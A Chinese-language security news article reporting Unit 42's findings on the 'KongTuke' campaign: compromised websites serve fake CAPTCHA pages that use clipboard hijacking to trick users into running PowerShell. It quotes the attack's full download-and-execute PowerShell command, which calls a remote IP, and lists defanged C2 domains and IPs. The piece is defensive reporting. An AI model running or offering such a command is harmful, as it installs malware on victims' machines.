剪贴板劫持利用伪造的验证码通过被黑网站窃取剪贴板数据

网络安全研究人员发现了一种名为“KongTuke”的复杂新型网络攻击链，它通过入侵合法网站攻击毫无戒心的互联网用户。

Palo Alto Networks 的 Unit 42 团队的 Bradley Duncan 在一份报告中详细介绍了此次攻击，该攻击利用恶意脚本和伪造的 CAPTCHA 页面劫持受害者的剪贴板并可能安装未识别的恶意软件。

该调查结果于 2025 年 4 月 4 日分享，Unit 42 Intel 在 X 上发布了更多见解，凸显了此次活动日益增长的威胁。

攻击链

KongTuke 攻击始于向合法但易受攻击的网站注入恶意脚本。报告中引用的一个例子是 hxxps://lancasternh[.]com/6t7y.js，它会将用户重定向到 hxxps://lancasternh[.]com/js.php 上的辅助脚本。

该脚本收集有关受害者设备的详细信息，包括 IP 地址、浏览器类型和引荐来源数据，以 base64 格式编码。

从那里，用户会被引导到一个模仿 CAPTCHA 的欺骗性“验证您是人类”页面，CAPTCHA 是一种常见的安全功能，旨在区分人类和机器人。

然而，这个 CAPTCHA 是个诡计。该页面不验证身份，而是采用一种称为“剪贴板劫持”或“粘贴劫持”的技术。它会秘密地将恶意的 PowerShell 脚本注入受害者的剪贴板，并附带指示，敦促用户通过 Windows 运行窗口粘贴并执行该脚本。

Duncan 详细描述了该脚本，其内容如下：

powershell -w h -c "iex $(irm 138.199.156[.]22:8080/$($z = [datetime]::UtcNow; $y = ([datetime]('01/01/' + '1970')); $x = ($z - $y).TotalSeconds; $w = [math]::Floor($x); $v = $w - ($w % 16); [int64]$v))"

此命令连接到远程服务器 138.199.156[.]22:8080，并根据时间戳计算检索其他恶意负载。

交通和感染后活动

根据 Unit 42 的报告，该脚本一旦执行，就会发起一系列网络请求。初始流量包括对同一 IP 地址的 GET 和 POST 请求，然后连接到 ecduutcykpvkbim[.]top 和 bfidmcjejlilflg[.]top 等域。

这些托管在 185.250.151[.]155:80 的域名似乎是进一步感染的中转站。感染后，受感染的系统通过 173.232.146[.]62:25658 与 8qvihxy8x5nyixj[.]top 建立命令和控制 (C2) 通信，使用 TLSv1.0 HTTPS 流量。

有趣的是，受感染的主机还使用 api.ipify[.]org 和 ipinfo[.]io 等服务执行 IP 地址检查，收集城市、地区和国家/地区等地理位置数据。虽然此步骤本身并不恶意，但它表明攻击者正在对受害者进行分析，以进行有针对性的利用。

熟悉却难以捉摸的威胁

网络安全社区一直在关注 KongTuke 活动，包括 Mastodon 上的 @monitorsg 和 ThreatFox，标签为 #KongTuke。邓肯指出，感染后的流量与著名远程访问木马 AsyncRAT 的模式相似。然而，最终的恶意软件负载仍未确定，因为研究人员尚未获得样本进行分析。这种不确定性凸显了威胁的不断演变以及打击威胁的挑战。

2025 年 4 月 4 日，Unit 42 Intel 通过 X 向公众发出警告，称：“在合法但被入侵的网站的页面中注入 #KongTuke 脚本会导致伪造的 # CAPTCHA样式页面和 #ClipboardHijacking（#pastejacking）。

这些页面要求用户将恶意脚本粘贴到运行窗口中。”该帖子可通过 https://x.com/Unit42_Intel/status/1908253830166323637 访问，其中包含更多详细信息的链接和虚假 CAPTCHA 页面的图片，强调了提高认识的紧迫性。

报告作者 Bradley Duncan 在他的笔记中强调了这次攻击的阴险性：“这个过程有时被称为‘剪贴板劫持’或‘粘贴劫持’，以例行验证为幌子诱骗用户执行有害代码。”使用受到感染的合法网站会增加一层信任，这使得攻击变得尤为危险。

网络安全专家敦促用户在遇到 CAPTCHA 提示时要小心谨慎，尤其是那些要求手动执行脚本的提示。合法的 CAPTCHA 通常涉及图像选择等简单任务，而不是复制和粘贴代码。用户还应保持系统更新，避免点击可疑链接，并使用强大的防病毒软件来检测和阻止此类威胁。

随着 KongTuke 活动的不断发展，Unit 42 及其他机构的研究人员正在努力识别最终的恶意软件并破坏攻击基础设施。目前，警惕仍然是防范这种在日常网络互动中利用信任的狡猾手段的最佳方法。